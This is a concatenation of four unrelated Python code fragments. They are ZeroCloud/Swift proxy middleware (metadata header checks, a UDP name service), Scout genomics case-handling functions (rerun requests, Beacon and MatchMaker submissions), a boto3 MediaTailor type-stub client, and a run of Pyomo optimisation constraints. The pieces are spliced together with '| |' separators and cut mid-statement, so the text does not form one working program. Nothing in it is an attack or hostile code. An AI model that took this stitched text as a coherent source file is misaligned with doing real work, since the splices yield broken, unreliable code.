if isinstance(value, basestring) and len(value) > MAX_HEADER_SIZE:
raise HTTPBadRequest(body='Header value too long: %s' %
key[:MAX_META_NAME_LENGTH],
request=req, content_type='text/plain')
if not key.lower().startswith(prefix):
if add_all and key.lower() not in STRIP_PAX_HEADERS and not \
key.lower().startswith('x-nexe-'):
new_req.headers[key] = value
continue
new_req.headers[key] = value
key = key[len(prefix):]
if not key:
raise HTTPBadRequest(body='Metadata name cannot be empty',
request=req, content_type='text/plain')
meta_count += 1
meta_size += len(key) + len(value)
if len(key) > MAX_META_NAME_LENGTH:
raise HTTPBadRequest(
body='Metadata name too long: %s%s' % (prefix, key),
request=req, content_type='text/plain')
elif len(value) > MAX_META_VALUE_LENGTH:
raise HTTPBadRequest(
body='Metadata value longer than %d: %s%s' % (
MAX_META_VALUE_LENGTH, prefix, key),
request=req, content_type='text/plain')
elif meta_count > MAX_META_COUNT:
raise HTTPBadRequest(
body='Too many metadata items; max %d' % MAX_META_COUNT,
request=req, content_type='text/plain')
elif meta_size > MAX_META_OVERALL_SIZE:
raise HTTPBadRequest(
body='Total metadata too large; max %d'
% MAX_META_OVERALL_SIZE,
request=req, content_type='text/plain')
def is_zerocloud_request(version, account, headers):
return account and (ZEROVM_EXECUTE in headers or version in
ZEROVM_COMMANDS)
class GreenPileEx(GreenPile):
"""Pool with iterator semantics. Good for I/O-related tasks."""
def __init__(self, size_or_pool=1000):
super(GreenPileEx, self).__init__(size_or_pool)
self.current = None
def next(self):
"""Wait for the next result, suspending the current greenthread until it
is available. Raises StopIteration when there are no more results."""
if self.counter == 0 and self.used:
raise StopIteration()
try:
if not self.current:
self.current = self.waiters.get()
res = self.current.wait()
self.current = None
return res
finally:
if not self.current:
self.counter -= 1
class CachedBody(object):
"""Implements caching and iterative consumption of large bodies.
Typical (and currently, the only) uses are for managing large tarball or
script submissions from the user. The reason why we do this is because user
submitted content is allowed to be any size--so we don't want to hold, for
example, an entire 5GiB tarball in memory.
CachedBody is iterable. The ``cache`` parameter contains at all times the
"head", while the ``read_iter`` contains the "tail".
"""
def __init__(self, read_iter, cache=None, cache_size=STREAM_CACHE_SIZE,
total_size=None):
"""
:param read_iter:
A stream iterable.
:param list cache:
Defaults to None. If ``cache`` is None, constructing a `CachedBody`
object will initialize the ``cache`` and read _at least_
``cache_size`` bytes from ``read_iter`` and store them in
``cache``. In other words, the beginning of a stream.
If a ``cache`` is specified, this can represent the intermediate
state of a cached body, where something is already in the cache. In
other words, "mid-stream".
:param int cache_size:
Minimum amount of bytes to cache from ``read_iter``. Note: If the
size of each chunk from ``read_iter`` is greater than
``cache_size``, the actual amount of bytes cached in ``cache`` will
be the chunk size.
:param int total_size:
(In bytes.) If ``total_size`` is set, iterate over the
``read_iter`` stream until ``total_size`` counts down to 0.
Else, just read chunks until ``read_iter`` raises a
`StopIteration`.
"""
self.read_iter = read_iter
self.total_size = total_size
if cache:
self.cache = cache
else:
self.cache = []
size = 0
for chunk in read_iter:
self.cache.append(chunk)
size += len(chunk)
if size >= cache_size:
break
def __iter__(self):
if self.total_size:
for chunk in self.cache:
self.total_size -= len(chunk)
if self.total_size < 0:
yield chunk[:self.total_size]
break
else:
yield chunk
if self.total_size > 0:
for chunk in self.read_iter:
self.total_size -= len(chunk)
if self.total_size < 0:
yield chunk[:self.total_size]
break
else:
yield chunk
for _junk in self.read_iter:
pass
else:
for chunk in self.cache:
yield chunk
for chunk in self.read_iter:
yield chunk
class FinalBody(object):
def __init__(self, app_iter):
self.app_iters = [app_iter]
def __iter__(self):
for app_iter in self.app_iters:
for chunk in app_iter:
yield chunk
def append(self, app_iter):
self.app_iters.append(app_iter)
class NameService(object):
"""DNS-like server using a binary protocol.
This is usable only with ZeroMQ-based networking for ZeroVM, and not
zbroker.
DNS resolves names to IPs; this name service resolves IDs to IP+port.
"""
# INTEGER (4 bytes)
INT_FMT = '!I'
# INTEGER (4 bytes) + HOST (2 bytes)
INPUT_RECORD_FMT = '!IH'
# 4 bytes of string + HOST (2 bytes)
OUTPUT_RECORD_FMT = '!4sH'
INT_SIZE = struct.calcsize(INT_FMT)
INPUT_RECORD_SIZE = struct.calcsize(INPUT_RECORD_FMT)
OUTPUT_RECORD_SIZE = struct.calcsize(OUTPUT_RECORD_FMT)
def __init__(self, peers):
"""
:param int peers:
Number of ZeroVM instances that will contact this name server.
"""
self.port = None
self.hostaddr = None
self.peers = peers
self.sock = None
self.thread = None
self.bind_map = {}
self.conn_map = {}
self.peer_map = {}
self.int_pool = GreenPool()
def start(self, pool):
"""
:param pool:
`GreenPool` instance
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind to any port, any address
self.sock.bind(('', 0))
self.thread = pool.spawn(self._run)
(self.hostaddr, self.port) = self.sock.getsockname()
def _run(self):
while 1:
try:
message, peer_address = self.sock.recvfrom(65535)
offset = 0
peer_id = struct.unpack_from(NameService.INT_FMT, message,
offset)[0]
offset += NameService.INT_SIZE
bind_count = struct.unpack_from(NameService.INT_FMT, message,
offset)[0]
offset += NameService.INT_SIZE
connect_count = struct.unpack_from(NameService.INT_FMT,
message, offset)[0]
offset += NameService.INT_SIZE
for i in range(bind_count):
connecting_host, port = struct.unpack_from(
NameService.INPUT_RECORD_FMT, message, offset)[0:2]
offset += NameService.INPUT_RECORD_SIZE
self.bind_map.setdefault(peer_id, {})[connecting_host] = \
port
self.conn_map[peer_id] = (connect_count,
offset,
ctypes.create_string_buffer(
message[:]))
# peer_address[0] == ip
self.peer_map.setdefault(peer_id, {})[0] = peer_address[0]
# peer_address[1] == port
self.peer_map.setdefault(peer_id, {})[1] = peer_address[1]
if len(self.peer_map) == self.peers:
for peer_id in self.peer_map.iterkeys():
(connect_count, offset, reply) = self.conn_map[peer_id]
for i in range(connect_count):
connecting_host = struct.unpack_from(
NameService.INT_FMT, reply, offset)[0]
port = self.bind_map[connecting_host][peer_id]
connect_to = self.peer_map[connecting_host][0]
if connect_to == self.peer_map[peer_id][0]:
# both on the same host
connect_to = '127.0.0.1'
struct.pack_into(NameService.OUTPUT_RECORD_FMT,
reply, offset,
socket.inet_pton(socket.AF_INET,
connect_to),
port)
offset += NameService.OUTPUT_RECORD_SIZE
self.sock.sendto(reply, (self.peer_map[peer_id][0],
self.peer_map[peer_id][1]))
except greenlet.GreenletExit:
return
except Exception:
print traceback.format_exc()
pass
def stop(self):
self.thread.kill()
self.sock.close()
class ProxyQueryMiddleware(object):
def list_account(self, account, mask=None, marker=None, request=None):
new_req = request.copy_get()
new_req.path_info = '/' + quote(account)
new_req.query_string = 'format=json'
if marker:
new_req.query_string += '&marker=' + marker
resp = AccountController(self.app, account).GET(new_req)
if resp.status_int == 204:
data = resp.body
return []
if resp.status_int < 200 or resp.status_int >= 300:
raise Exception('Error querying object server')
data = json.loads(resp.body)
if marker:
return data
ret = []
while data:
for item in data:
if not mask or mask.match(item['name']):
ret.append(item['name'])
marker = data[-1]['name']
data = self.list_account(account, mask=None, marker=marker,
request=request)
return ret
def list_container(self, account, container, mask=None, marker=None,
request=None):
new_req | |
diseases
except RuntimeError:
flash("Could not establish a conection to Phenomizer", "danger")
def rerun(store, mail, current_user, institute_id, case_name, sender, recipient):
"""Request a rerun by email."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
if case_obj.get("rerun_requested") and case_obj["rerun_requested"] is True:
flash("Rerun already pending", "info")
return
store.request_rerun(institute_obj, case_obj, user_obj, link)
# this should send a JSON document to the SuSy API in the future
html = """
<p>{institute}: {case} ({case_id})</p>
<p>Re-run requested by: {name}</p>
""".format(
institute=institute_obj["display_name"],
case=case_obj["display_name"],
case_id=case_obj["_id"],
name=user_obj["name"].encode(),
)
# compose and send the email message
msg = Message(
subject=("SCOUT: request RERUN for {}".format(case_obj["display_name"])),
html=html,
sender=sender,
recipients=[recipient],
# cc the sender of the email for confirmation
cc=[user_obj["email"]],
)
if recipient:
mail.send(msg)
else:
LOG.error("Cannot send rerun message: no recipient defined in config.")
def call_rerunner(store, institute_id, case_name, metadata):
"""Call rerunner with updated pedigree metadata."""
# define the data to be passed
payload = {"case_id": case_name, "sample_ids": [m["sample_id"] for m in metadata]}
cnf = rerunner.connection_settings
url = cnf.get("entrypoint")
if not url:
raise ValueError("Rerunner API entrypoint not configured")
auth = HTTPBasicAuth(current_user.email, cnf.get("api_key"))
LOG.info(f"Sending request -- {url}; params={payload}")
resp = requests.post(
url,
params=payload,
json=metadata,
timeout=rerunner.timeout,
headers={"Content-Type": "application/json"},
auth=auth,
)
if resp.status_code == 200:
LOG.info(f"Reanalysis was successfully started; case: {case_name}")
# get institute, case and user objects for adding a notification of the rerun to the database
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
store.request_rerun(institute_obj, case_obj, user_obj, link)
# notfiy the user of the rerun
flash(f"Reanalysis was successfully started; case: {case_name}", "info")
else:
raise RerunnerError(f"{resp.reason}, {resp.status_code}")
def update_default_panels(store, current_user, institute_id, case_name, panel_ids):
"""Update default panels for a case."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
panel_objs = [store.panel(panel_id) for panel_id in panel_ids]
store.update_default_panels(institute_obj, case_obj, user_obj, link, panel_objs)
def update_clinical_filter_hpo(store, current_user, institute_id, case_name, hpo_clinical_filter):
"""Update HPO clinical filter use for a case."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
user_obj = store.user(current_user.email)
link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
store.update_clinical_filter_hpo(institute_obj, case_obj, user_obj, link, hpo_clinical_filter)
def add_case_group(store, current_user, institute_id, case_name, group=None):
"""Bind a case group in a selected a case, creating it in current institute if not given.
Args:
current_user (user)current user
institute_id (str)institute id
case_name (str)case display name
group (str)case group id - converts to ObjectId
Returns:
updated_case (InsertOneResult)
"""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
user_obj = store.user(current_user.email)
if not group:
group = store.init_case_group(institute_id)
current_group_ids = set(case_obj.get("group", []))
current_group_ids.add(ObjectId(group))
updated_case = store.update_case_group_ids(
institute_obj, case_obj, user_obj, link, list(current_group_ids)
)
return updated_case
def remove_case_group(store, current_user, institute_id, case_name, case_group):
"""Remove a case group from selected institute - and from db if it is no longer in use."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
link = url_for("cases.case", institute_id=institute_id, case_name=case_name)
user_obj = store.user(current_user.email)
current_group_ids = case_obj.get("group", [])
# STR OBJID mismatch?
current_group_ids.remove(ObjectId(case_group))
updated_case = store.update_case_group_ids(
institute_obj, case_obj, user_obj, link, current_group_ids
)
current_group_cases = store.case_ids_from_group_id(case_group)
if current_group_cases == []:
store.remove_case_group(case_group)
return updated_case
def case_group_update_label(store, case_group_id, case_group_label):
"""Update a case group label."""
result = store.case_group_update_label(ObjectId(case_group_id), case_group_label)
return result
def vcf2cytosure(store, institute_id, case_name, individual_id):
"""vcf2cytosure CGH file for inidividual."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
for individual in case_obj["individuals"]:
if individual["individual_id"] == individual_id:
individual_obj = individual
return (individual_obj["display_name"], individual_obj["vcf2cytosure"])
def multiqc(store, institute_id, case_name):
"""Find MultiQC report for the case."""
institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
return dict(institute=institute_obj, case=case_obj)
def prepare_beacon_req_params():
"""Prepares URL and Headers for sending a request to the beacon server.
Returns:
url, headers(tuple)
"""
req_url = current_app.config.get("BEACON_URL")
beacon_token = current_app.config.get("BEACON_TOKEN")
if not req_url or not beacon_token:
return
req_headers = JSON_HEADERS
req_headers["X-Auth-Token"] = beacon_token
return req_url, req_headers
def beacon_remove(case_id):
"""Remove all variants from a case in Beacon by handling a POST request to the /apiv1.0/delete Beacon endpoint.
Args:
case_id(str): A case _id
"""
if prepare_beacon_req_params() is None:
flash(
"Please check config file. It should contain both BEACON_URL and BEACON_TOKEN",
"warning",
)
return
request_url, req_headers = prepare_beacon_req_params()
case_obj = store.case(case_id=case_id)
beacon_submission = case_obj.get("beacon")
if beacon_submission is None:
flash("Couldn't find a valid beacon submission for this case", "warning")
return
# Prepare beacon request data
assembly = "GRCh37" if "37" in str(case_obj["genome_build"]) else "GRCh38"
dataset_id = "_".join([case_obj["owner"], assembly])
samples = [sample for sample in beacon_submission.get("samples", [])]
data = {"dataset_id": dataset_id, "samples": samples}
resp = delete_request_json("/".join([request_url, "delete"]), req_headers, data)
flash_color = "success"
message = resp.get("content", {}).get("message")
if resp.get("status_code") == 200:
store.case_collection.update_one({"_id": case_obj["_id"]}, {"$unset": {"beacon": 1}})
else:
flash_color = "warning"
flash(f"Beacon responded:{message}", flash_color)
def beacon_add(form):
"""Save variants from one or more case samples to the Beacon server.
Handle a POST request to the /apiv1.0/add Beacon endpoint
Args:
form(werkzeug.datastructures.ImmutableMultiDict): beacon submission form
"""
if prepare_beacon_req_params() is None:
flash(
"Please check config file. It should contain both BEACON_URL and BEACON_TOKEN",
"warning",
)
return
request_url, req_headers = prepare_beacon_req_params()
case_obj = store.case(case_id=form.get("case"))
# define case individuals (individual_id, same as in VCF) to filter VCF files with
individuals = []
if form.get("samples") == "affected":
individuals = [
ind["individual_id"] for ind in case_obj["individuals"] if ind["phenotype"] == 2
]
else:
individuals = [ind["individual_id"] for ind in case_obj["individuals"]]
# define genes to filter VCF files with
gene_filter = set()
for panel in form.getlist("panels"):
gene_filter.update(store.panel_to_genes(panel_id=panel, gene_format="hgnc_id"))
gene_filter = list(gene_filter)
submission = {
"created_at": datetime.datetime.now(),
"user": current_user.email,
"samples": individuals,
"panels": form.getlist("panels"),
"vcf_files": [],
}
# Prepare beacon request data
assembly = "GRCh37" if "37" in str(case_obj["genome_build"]) else "GRCh38"
data = {
"dataset_id": "_".join([case_obj["owner"], assembly]),
"samples": individuals,
"assemblyId": assembly,
}
if gene_filter: # Gene filter is not mandatory
data["genes"] = {"ids": gene_filter, "id_type": "HGNC"}
# loop over selected VCF files and send an add request to Beacon for each one of them
vcf_files = form.getlist("vcf_files")
if not vcf_files:
flash("Please select at least one VCF file to save to Beacon", "warning")
return
for vcf_key in form.getlist("vcf_files"):
data["vcf_path"] = case_obj["vcf_files"].get(vcf_key)
resp = post_request_json("/".join([request_url, "add"]), data, req_headers)
if resp.get("status_code") != 200:
flash(f"Beacon responded:{resp.get('content',{}).get('message')}", "warning")
continue
submission["vcf_files"].append(vcf_key)
if len(submission["vcf_files"]) > 0:
flash(
f"Variants from the following files are going to be saved to Beacon:{submission['vcf_files']}",
"success",
)
store.case_collection.find_one_and_update(
{"_id": case_obj["_id"]}, {"$set": {"beacon": submission}}
)
return
def matchmaker_check_requirements(request):
"""Make sure requirements are fulfilled before submitting any request to MatchMaker Exchange
Args:
request(werkzeug.local.LocalProxy)
Returns:
None, if requirements are fulfilled, otherwise redirects to previous page with error message
"""
# Make sure all MME connection parameters are available in scout instance
if (
any(
[
hasattr(matchmaker, "host"),
hasattr(matchmaker, "accept"),
hasattr(matchmaker, "token"),
]
)
is None
):
flash(
"An error occurred reading matchmaker connection parameters. Please check config file!",
"danger",
)
return redirect(request.referrer)
# Check that request comes from an authorized user (mme_submitter role)
user_obj = store.user(current_user.email)
if "mme_submitter" not in user_obj.get("roles", []):
flash("unauthorized request", "warning")
return redirect(request.referrer)
def matchmaker_add(request, institute_id, case_name):
"""Add all affected individuals from a case to a MatchMaker server
Args:
request(werkzeug.local.LocalProxy)
institute_id(str): _id of an institute
case_name(str): display name of a case
"""
# Check that general MME request requirements are fulfilled
matchmaker_check_requirements(request)
_, case_obj = institute_and_case(store, institute_id, case_name)
candidate_vars = request.form.getlist("selected_var")
if len(candidate_vars) > 3:
flash(
"At the moment it is not possible to save to MatchMaker more than 3 candidate variants / genes",
"warning",
)
return redirect(request.referrer)
save_gender = "sex" in request.form
features = (
hpo_terms(case_obj)
if "features" in request.form and case_obj.get("phenotype_terms")
else []
)
disorders = omim_terms(case_obj) if "disorders" in request.form else []
genes_only = request.form.get("genomicfeatures") == "genes"
if not features and not candidate_vars:
flash(
"In order to upload a case to MatchMaker you need to pin a variant or at least assign a phenotype (HPO term)",
"danger",
)
return redirect(request.referrer)
# create contact dictionary
user_obj = store.user(current_user.email)
contact_info = {
"name": user_obj["name"],
"href": "".join(["mailto:", user_obj["email"]]),
"institution": "Scout software user, Science For Life Laboratory, Stockholm, Sweden",
}
submitted_info = {
"contact": contact_info,
"sex": save_gender,
"features": features,
"disorders": disorders,
"genes_only": genes_only,
"patient_id": [],
"server_responses": [],
}
server_responses = []
n_updated = 0
for individual in case_obj.get("individuals"):
if not individual["phenotype"] in [
2,
"affected",
]: # include only affected individuals
continue
patient = {
"contact": contact_info,
"id": ".".join(
[case_obj["_id"], individual.get("individual_id")]
), # This is a required field form MME
"label": ".".join([case_obj["display_name"], individual.get("display_name")]),
"features": features,
"disorders": disorders,
}
| |
<reponame>cowboygneox/boto3_type_annotations<gh_stars>100-1000
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def delete_playback_configuration(self, Name: str) -> Dict:
"""
Deletes the playback configuration for the specified name.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/mediatailor-2018-04-23/DeletePlaybackConfiguration>`_
**Request Syntax**
::
response = client.delete_playback_configuration(
Name='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
The request was successful and there is no content in the response.
:type Name: string
:param Name: **[REQUIRED]**
The identifier for the playback configuration.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_playback_configuration(self, Name: str) -> Dict:
"""
Returns the playback configuration for the specified name.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/mediatailor-2018-04-23/GetPlaybackConfiguration>`_
**Request Syntax**
::
response = client.get_playback_configuration(
Name='string'
)
**Response Syntax**
::
{
'AdDecisionServerUrl': 'string',
'CdnConfiguration': {
'AdSegmentUrlPrefix': 'string',
'ContentSegmentUrlPrefix': 'string'
},
'DashConfiguration': {
'ManifestEndpointPrefix': 'string',
'MpdLocation': 'string',
'OriginManifestType': 'SINGLE_PERIOD'|'MULTI_PERIOD'
},
'HlsConfiguration': {
'ManifestEndpointPrefix': 'string'
},
'Name': 'string',
'PlaybackConfigurationArn': 'string',
'PlaybackEndpointPrefix': 'string',
'SessionInitializationEndpointPrefix': 'string',
'SlateAdUrl': 'string',
'Tags': {
'string': 'string'
},
'TranscodeProfileName': 'string',
'VideoContentSourceUrl': 'string'
}
**Response Structure**
- *(dict) --*
Success.
- **AdDecisionServerUrl** *(string) --*
The URL for the ad decision server (ADS). This includes the specification of static parameters and placeholders for dynamic parameters. AWS Elemental MediaTailor substitutes player-specific and session-specific parameters as needed when calling the ADS. Alternately, for testing, you can provide a static VAST URL. The maximum length is 25,000 characters.
- **CdnConfiguration** *(dict) --*
The configuration for using a content delivery network (CDN), like Amazon CloudFront, for content and ad segment management.
- **AdSegmentUrlPrefix** *(string) --*
A non-default content delivery network (CDN) to serve ad segments. By default, AWS Elemental MediaTailor uses Amazon CloudFront with default cache settings as its CDN for ad segments. To set up an alternate CDN, create a rule in your CDN for the following origin: ads.mediatailor.<region>.amazonaws.com. Then specify the rule's name in this AdSegmentUrlPrefix. When AWS Elemental MediaTailor serves a manifest, it reports your CDN as the source for ad segments.
- **ContentSegmentUrlPrefix** *(string) --*
A content delivery network (CDN) to cache content segments, so that content requests don’t always have to go to the origin server. First, create a rule in your CDN for the content segment origin server. Then specify the rule's name in this ContentSegmentUrlPrefix. When AWS Elemental MediaTailor serves a manifest, it reports your CDN as the source for content segments.
- **DashConfiguration** *(dict) --*
The configuration for DASH content.
- **ManifestEndpointPrefix** *(string) --*
The URL generated by MediaTailor to initiate a playback session. The session uses server-side reporting. This setting is ignored in PUT operations.
- **MpdLocation** *(string) --*
The setting that controls whether MediaTailor includes the Location tag in DASH manifests. MediaTailor populates the Location tag with the URL for manifest update requests, to be used by players that don't support sticky redirects. Disable this if you have CDN routing rules set up for accessing MediaTailor manifests, and you are either using client-side reporting or your players support sticky HTTP redirects. Valid values are DISABLED and EMT_DEFAULT. The EMT_DEFAULT setting enables the inclusion of the tag and is the default value.
- **OriginManifestType** *(string) --*
The setting that controls whether MediaTailor handles manifests from the origin server as multi-period manifests or single-period manifests. If your origin server produces single-period manifests, set this to SINGLE_PERIOD. The default setting is MULTI_PERIOD. For multi-period manifests, omit this setting or set it to MULTI_PERIOD.
- **HlsConfiguration** *(dict) --*
The configuration for HLS content.
- **ManifestEndpointPrefix** *(string) --*
The URL that is used to initiate a playback session for devices that support Apple HLS. The session uses server-side reporting.
- **Name** *(string) --*
The identifier for the playback configuration.
- **PlaybackConfigurationArn** *(string) --*
The Amazon Resource Name (ARN) for the playback configuration.
- **PlaybackEndpointPrefix** *(string) --*
The URL that the player accesses to get a manifest from AWS Elemental MediaTailor. This session will use server-side reporting.
- **SessionInitializationEndpointPrefix** *(string) --*
The URL that the player uses to initialize a session that uses client-side reporting.
- **SlateAdUrl** *(string) --*
The URL for a high-quality video asset to transcode and use to fill in time that's not used by ads. AWS Elemental MediaTailor shows the slate to fill in gaps in media content. Configuring the slate is optional for non-VPAID playback configurations. For VPAID, the slate is required because MediaTailor provides it in the slots designated for dynamic ad content. The slate must be a high-quality asset that contains both audio and video.
- **Tags** *(dict) --*
The tags assigned to the playback configuration.
- *(string) --*
- *(string) --*
- **TranscodeProfileName** *(string) --*
The name that is used to associate this playback configuration with a custom transcode profile. This overrides the dynamic transcoding defaults of MediaTailor. Use this only if you have already set up custom profiles with the help of AWS Support.
- **VideoContentSourceUrl** *(string) --*
The URL prefix for the master playlist for the stream, minus the asset ID. The maximum length is 512 characters.
:type Name: string
:param Name: **[REQUIRED]**
The identifier for the playback configuration.
:rtype: dict
:returns:
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def list_playback_configurations(self, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Returns a list of the playback configurations defined in AWS Elemental MediaTailor. You can specify a maximum number of configurations to return at a time. The default maximum is 50. Results are returned in pagefuls. If MediaTailor has more configurations than the specified maximum, it provides parameters in the response that you can use to retrieve the next pageful. | |
- m.x105)*m.x507) + m.x506) == 0)
m.c306 = Constraint(expr=m.x508 - (0.0025*(m.x105*(m.x306 - 10*m.x507) - (1 - m.x105)*m.x507 + m.x106*(m.x307 - 10*
m.x508) - (1 - m.x106)*m.x508) + m.x507) == 0)
m.c307 = Constraint(expr=m.x509 - (0.0025*(m.x106*(m.x307 - 10*m.x508) - (1 - m.x106)*m.x508 + m.x107*(m.x308 - 10*
m.x509) - (1 - m.x107)*m.x509) + m.x508) == 0)
m.c308 = Constraint(expr=m.x510 - (0.0025*(m.x107*(m.x308 - 10*m.x509) - (1 - m.x107)*m.x509 + m.x108*(m.x309 - 10*
m.x510) - (1 - m.x108)*m.x510) + m.x509) == 0)
m.c309 = Constraint(expr=m.x511 - (0.0025*(m.x108*(m.x309 - 10*m.x510) - (1 - m.x108)*m.x510 + m.x109*(m.x310 - 10*
m.x511) - (1 - m.x109)*m.x511) + m.x510) == 0)
m.c310 = Constraint(expr=m.x512 - (0.0025*(m.x109*(m.x310 - 10*m.x511) - (1 - m.x109)*m.x511 + m.x110*(m.x311 - 10*
m.x512) - (1 - m.x110)*m.x512) + m.x511) == 0)
m.c311 = Constraint(expr=m.x513 - (0.0025*(m.x110*(m.x311 - 10*m.x512) - (1 - m.x110)*m.x512 + m.x111*(m.x312 - 10*
m.x513) - (1 - m.x111)*m.x513) + m.x512) == 0)
m.c312 = Constraint(expr=m.x514 - (0.0025*(m.x111*(m.x312 - 10*m.x513) - (1 - m.x111)*m.x513 + m.x112*(m.x313 - 10*
m.x514) - (1 - m.x112)*m.x514) + m.x513) == 0)
m.c313 = Constraint(expr=m.x515 - (0.0025*(m.x112*(m.x313 - 10*m.x514) - (1 - m.x112)*m.x514 + m.x113*(m.x314 - 10*
m.x515) - (1 - m.x113)*m.x515) + m.x514) == 0)
m.c314 = Constraint(expr=m.x516 - (0.0025*(m.x113*(m.x314 - 10*m.x515) - (1 - m.x113)*m.x515 + m.x114*(m.x315 - 10*
m.x516) - (1 - m.x114)*m.x516) + m.x515) == 0)
m.c315 = Constraint(expr=m.x517 - (0.0025*(m.x114*(m.x315 - 10*m.x516) - (1 - m.x114)*m.x516 + m.x115*(m.x316 - 10*
m.x517) - (1 - m.x115)*m.x517) + m.x516) == 0)
m.c316 = Constraint(expr=m.x518 - (0.0025*(m.x115*(m.x316 - 10*m.x517) - (1 - m.x115)*m.x517 + m.x116*(m.x317 - 10*
m.x518) - (1 - m.x116)*m.x518) + m.x517) == 0)
m.c317 = Constraint(expr=m.x519 - (0.0025*(m.x116*(m.x317 - 10*m.x518) - (1 - m.x116)*m.x518 + m.x117*(m.x318 - 10*
m.x519) - (1 - m.x117)*m.x519) + m.x518) == 0)
m.c318 = Constraint(expr=m.x520 - (0.0025*(m.x117*(m.x318 - 10*m.x519) - (1 - m.x117)*m.x519 + m.x118*(m.x319 - 10*
m.x520) - (1 - m.x118)*m.x520) + m.x519) == 0)
m.c319 = Constraint(expr=m.x521 - (0.0025*(m.x118*(m.x319 - 10*m.x520) - (1 - m.x118)*m.x520 + m.x119*(m.x320 - 10*
m.x521) - (1 - m.x119)*m.x521) + m.x520) == 0)
m.c320 = Constraint(expr=m.x522 - (0.0025*(m.x119*(m.x320 - 10*m.x521) - (1 - m.x119)*m.x521 + m.x120*(m.x321 - 10*
m.x522) - (1 - m.x120)*m.x522) + m.x521) == 0)
m.c321 = Constraint(expr=m.x523 - (0.0025*(m.x120*(m.x321 - 10*m.x522) - (1 - m.x120)*m.x522 + m.x121*(m.x322 - 10*
m.x523) - (1 - m.x121)*m.x523) + m.x522) == 0)
m.c322 = Constraint(expr=m.x524 - (0.0025*(m.x121*(m.x322 - 10*m.x523) - (1 - m.x121)*m.x523 + m.x122*(m.x323 - 10*
m.x524) - (1 - m.x122)*m.x524) + m.x523) == 0)
m.c323 = Constraint(expr=m.x525 - (0.0025*(m.x122*(m.x323 - 10*m.x524) - (1 - m.x122)*m.x524 + m.x123*(m.x324 - 10*
m.x525) - (1 - m.x123)*m.x525) + m.x524) == 0)
m.c324 = Constraint(expr=m.x526 - (0.0025*(m.x123*(m.x324 - 10*m.x525) - (1 - m.x123)*m.x525 + m.x124*(m.x325 - 10*
m.x526) - (1 - m.x124)*m.x526) + m.x525) == 0)
m.c325 = Constraint(expr=m.x527 - (0.0025*(m.x124*(m.x325 - 10*m.x526) - (1 - m.x124)*m.x526 + m.x125*(m.x326 - 10*
m.x527) - (1 - m.x125)*m.x527) + m.x526) == 0)
m.c326 = Constraint(expr=m.x528 - (0.0025*(m.x125*(m.x326 - 10*m.x527) - (1 - m.x125)*m.x527 + m.x126*(m.x327 - 10*
m.x528) - (1 - m.x126)*m.x528) + m.x527) == 0)
m.c327 = Constraint(expr=m.x529 - (0.0025*(m.x126*(m.x327 - 10*m.x528) - (1 - m.x126)*m.x528 + m.x127*(m.x328 - 10*
m.x529) - (1 - m.x127)*m.x529) + m.x528) == 0)
m.c328 = Constraint(expr=m.x530 - (0.0025*(m.x127*(m.x328 - 10*m.x529) - (1 - m.x127)*m.x529 + m.x128*(m.x329 - 10*
m.x530) - (1 - m.x128)*m.x530) + m.x529) == 0)
m.c329 = Constraint(expr=m.x531 - (0.0025*(m.x128*(m.x329 - 10*m.x530) - (1 - m.x128)*m.x530 + m.x129*(m.x330 - 10*
m.x531) - (1 - m.x129)*m.x531) + m.x530) == 0)
